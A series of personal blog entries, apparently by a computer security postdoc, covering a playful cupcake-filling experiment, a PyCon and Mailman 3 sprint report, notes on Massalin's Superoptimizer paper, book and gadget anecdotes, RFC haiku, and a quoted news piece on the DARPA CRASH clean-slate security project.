The remaining cupcakes have been divided into two groups. One has been filled with googe and iced and placed in the fridge to age for 24h. After the time has elapsed, two prepared cupcakes will be removed from refrigeration and eaten by experimental subjects J and T. If they are deemed an improvement over the freshly assembled cupcakes, the rest of the batch will be prepared in a similar manner. After 48h have passed, experimental subjects will be able to compare 0-day cupcakes, 24h cupcakes, and 48h cupcakes. If the prepared cupcakes are deemed unsuitable at 24h (likely due to structural integrity failures), then the control batch will be left untouched until shortly before the 2600 meeting which will represent our larger clinical cupcake trial. This will not be a double-blinded experiment, although one could be conducted at a later date to more comprehensively test cupcake saturation over time.

Hypothesis 2: 400ml is way to much googe

Method: 400ml of googe solution has been prepared and will be inserted into cupcakes as described above. If the cupcakes cannot hold this amount of googe, the remainder will be given to the experimental subjects for consumption or further experimentation. We will report back on crowdsourced solutions for too much googe after the clinical trials are complete.

Cupcake Clinical Trial

If you wish to participate in this clinical cupcake trial, please attend the 2600 meeting at Quelab on Friday April 5, 2013. Please note that I have not obtained ethics approval for this experiment and you will be participating at your own risk.

Entry tags:

Back from Pycon!

I should write up a proper trip report with pictures and stuff, but as it's nearly midnight and I don't want my sleeping patterns to stay on California time, you get some short highlights:

1. The conference itself was awesome. Recall: I attended the sprints last year but not the main conference, so while I had high hopes I didn't know that the content would be so good. I attended a lot of great talks and no doubt missed quite a few as well. I'll be making heavy use of the conference recordings over the next little while, I expect.

2. I am really excited about my free raspberry pi. While I know lots of folk who frequently get given cool toys and told to go hack them, this is the first time someone has gifted me with such an item/mission, and it feels great. I haven't figured out what I'm going to do yet, but there was this great talk about hooking one up to a $300 CNC machine, and another great one about home automation that could be useful...

3. The sprints were super-productive! You can see our todo/completed/waiting list here if you want the nitty gritty. I'd been joking earlier to anyone who asked that we were totally going to release by Friday, and while we didn't do that, we *are* very close and you should all expect a beta release of postorius + Mailman 3 very soon. I can't wait to show it off!

4. Perhaps later I'll do up the stats on exactly what I was doing to our repository, but I should tell you that not only did I make plenty of my own code commits, but I also got to merge code from new contributors. This was totally my favourite part, seeing new folk get their code accepted and in the main tree. And it wasn't just the people who were physically at the sprints with us: I also merged code from people contributing remotely, most of whom are prospective GSoC students. Way to impress me, students!

5. I got to talk to a bunch of people about GSoC. I do this all the time by email, but it was especially fun to talk to folk in person about what's involved, why it's awesome, how to be good at it, and why they should sign up.

6. And post-con, I got a few days to catch up with friends in the area and visit the Japanese Tea Gardens in Golden Gate Park, which I've wanted to do ever since I read Seanan Mcguire's October Daye books. As I processed a few photos for this week's assignment, you get one here:

And with that, midnight has rung and it's bedtime. I have a long week of catch-up ahead of me at work, but expect some more pycon / mailman / gsoc posts out of me over the next little while as I internalize all the things I've been thinking about this past week.

Entry tags:

PyCon PyCon PyCon PyCon

I'm not leaving yet, but it's just becoming increasingly hard to think about anything else. Which is really unfortunate, because my deal to myself was that I'd work this week (which is spring break at UNM) in exchange for taking next week off for hacking.

So, uh, yeah, back to work now. :)

Entry tags:

My awesomely nerdy life

It's been a while since I just wrote about what I'm doing, so let me tell you about some of this week:

Cory Doctorow (Speaking in Albuquerque, NM)

On Wednesday I...

... continued to run cool experiments on mutated software at work.
... went to see Cory Doctorow speak at the library.
... went out for falafel with some local hacklab folk.
... beat up an ingress portal with the help of my lvl 8 friend.

Today was less cool, what with the 2hr taxes-for-aliens session (not actually what they call it, but accurate enough), but I did make some coffee cupcakes with cream cheese icing.

I plan to feed those to my coworkers (partially to make fun of the fact that we ran out of coffee today. "Look, I brought coffee!") and anyone who shows up at the local 2600 meeting tomorrow.

Then, on Saturday I'm going to build stilts and hopefully learn to walk on them! Or more likely, bruise my knees a lot, but hey, can never learn if I don't try, right?

And on Sunday I'm playing a concert of predominantly Percy Grainger music (which is pretty music-nerdy), and then hopefully taking part in a meeting to start a local Hacker Scouts guild.

So yeah, I've mostly been living life rather than photographing it and posting about it lately, but it is a very awesome life and you should all be jealous, promise!

Entry tags:

academia,
papers

Academic Notes: Superoptimizer -- A Look at the Smallest Program

Ages ago, I thought it would be a brilliant idea to write up stuff on the papers I read, much like I do book reviews, but then I promptly... didn't do it. But it's a new year with new papers, and here's the first for this year's seminar.

Photo: small toad by Scott* (Because tiny toads are adorable and compiler papers notes don't lend themselves to obvious illustration)

Superoptimizer -- A Look at the Smallest Program
Henry Massalin
1987

This is a neat little paper about optimizing assembly code. They took a program and then had the computer try to generate the smallest possible functionally equivalent version. The paper is super short and readable and filled with lots of very clever adding of registers and stuff to avoid program jumps and comparisons. They could get it to optimize only fairly small programs (12 lines of assembly), but it still seemed like a lot of these would be useful compiler optimizations and they're probably in use now.

Anyhow, it's three pages of explanation + two pages of cool examples they found, so if you're looking for a fun little bit of computing to read about to fill out some mind-expanding new year's resolution, this is an easy place to start.

Some questions we had in seminar that I don't know the answers to:

- What was the impact of this paper on modern compilers?
- Do we do any of this while compiling, or make use of the things they found in a preset kind of way?
- Has anyone tried to do this using modern computers / other assembly instruction sets?
- It seemed like there was a lot of adding... would it be possible to make reduced assembly instruction sets on the assumption that they will never be programmed by humans and thus can be super-optimal?

Entry tags:

book

Book review: Under Wraps

I haven't been keeping up with my book reviews here although I do add them to librarything and should probably just write myself an export script so it's easier for me. But whatever, that's not done yet, and I finished a book this afternoon while I was waiting for my experiment to run, so here it is.

Under Wraps (The Underworld Detection Agency Chronicles)
by Hannah Jayne

I liked the characters and the world of this funny urban fantasy, but they seemed almost out of sync with the murder that Sophie is supposed to be solving: the serial murder case seemed to take a back seat to the banter and internal monologuing of our somewhat hapless heroine. If you're looking for serious urban fantasy give this a miss, but it's fun in a first season Buffy sort of way. I'm not sure if it really grabbed me enough to read the next one, but who knows, maybe it'll grow into something more as the series expands?

Winter Driving

I spent 3 weeks up in Ottawa, and the one thing I was looking forwards to was not having to do any more serious winter driving.

Guess what it was like here on Monday?

On the bright side, I'm glad people drive super carefully around here when they're uncertain. But it's very hard not to laugh when we're inching down the road over a light dusting of snow. Good thing I wasn't in a hurry!

Entry tags:

life

Happy Holidays!

Looking at my twitter feed, it seems I spent my holiday with my grandmother's dog, so here's a picture:

I've been having a lovely time with my parents and Buster the dog, all of whom like long walks in the local woods. My fitbit tells me their standard afternoon walk is just shy of 3 miles, which is still more meaningful to my not entirely metric parents than it is to me, but I'm slowly learning distances in imperial from living in the US. I spent the first few days in self-quarantine since John had finally infected me with the cold/flu he caught on the way back from St. Lucia, but to be honest all I did was sneeze on a TSA agent or two, have one miserable night when I arrived and then my immune system squashed it. Yeay immune systems! So I spent a few quiet reading and walking days that I probably didn't have to do to avoid being a disease vector, but it was lovely to read and walk and enjoy the local trails.

The next few days will be a bit more chaotic as I try to meet up with people while I'm in town. If you want to get on the list, let me know! My old canadian cell # is active if you want to get in touch, and I'll be in town 'till the 7th minus a few days at new year's as usual.

Entry tags:

Kindle Fire, take 3

You may recall that my Kindle Fire decided to stop charging right before I went off on my vacation at the beginning of December, and I had a somewhat terrible experience with Amazon's online customer service but they did in the end replace it under warranty.

I've had the replacement for two weeks, and it was acting a bit weird, rebooting while I was doing things like reading pdfs. So last night, I looked up whether this was a common problem and the suggestion seemed to be to hard reboot it, so I did.

The kindle has been stuck at the kindle fire reboot screen for about 12 hours now.

Since the online chat support was awful last time, I called Amazon this time and the phone support lady was very nice, efficient and was very apologetic about not being able to get me a new device until Jan 4th. But the replacement is in the works, I just won't get it 'till after I get back from Ottawa.

Meanwhile, dead kindle #2 won't boot up and also won't shut down, so I may be sticking a running device in the mail, which feels kind of weird. Not much for it, though, since the thing is utterly unresponsive. Maybe it'll run out of battery before I get out to mail it this afternoon.

Entry tags:

geek

RFC Poetry

A friend of mine wrote a twitter bot that spits out random bits of RFCs, somewhat inspired by horse_ebooks, and I suggested it would be nice if it wrote haiku, so now it does. It's not very good at it, but I found this almost poem in the feed:

Townson makes it has
the switch functions
02 Elgamal public key

And now I really want to write a haiku including the words "elgamal public key" -- pity "exchange" doesn't fit that into a 7-syllable line.

Some of the more intentional poetry it's written:

to authenticate the
already done our paper we have
home address found

It's almost poignant. Or Yoda crossed with Glinda the good witch, whatever.

Entry tags:

academia,
work

On what I do

You may have seen this article on Peter G. Neumann: Killing the Computer to Save It. It was making the rounds a few weeks ago. (Note that you can read NYT articles without logging in if you turn on temporary cookies and then click the link.)

In case you were curious or maybe thought some of that sounded familiar, that is indeed the same DARPA grant that drew me to the US for this postdoc. I'm on CRASH or "Clean-Slate Design of Resilient Adaptive Secure Hosts." The article has a short mention of the stuff we're doing:

Clean Slate is financing research to explore how to design computer systems that are less vulnerable to computer intruders and recover more readily once security is breached.

Dr. Shrobe argues that because the industry is now in a fundamental transition from desktop to mobile systems, it is a good time to completely rethink computing. But among the biggest challenges is the monoculture of the computer “ecosystem” of desktop, servers and networks, he said.

“Nature abhors monocultures, and that’s exactly what we have in the computer world today,” said Dr. Shrobe. “Eighty percent are running the same operating system.”

Lessons From Biology

To combat uniformity in software, designers are now pursuing a variety of approaches that make computer system resources moving targets. Already some computer operating systems scramble internal addresses much the way a magician might perform the trick of hiding a pea in a shell. The Clean Slate project is taking that idea further, essentially creating software that constantly shape-shifts to elude would-be attackers.

That the Internet enables almost any computer in the world to connect directly to any other makes it possible for an attacker who identifies a single vulnerability to almost instantly compromise a vast number of systems.

But borrowing from another science, Dr. Neumann notes that biological systems have multiple immune systems — not only are there initial barriers, but a second system consisting of sentinels like T cells has the ability to detect and eliminate intruders and then remember them to provide protection in the future.

In contrast, today’s computer and network systems were largely designed with security as an afterthought, if at all.

That barely touches on all the cool stuff we're doing, since the article isn't exactly about our work at UNM & UVA, but it was pretty neat to see it in the news.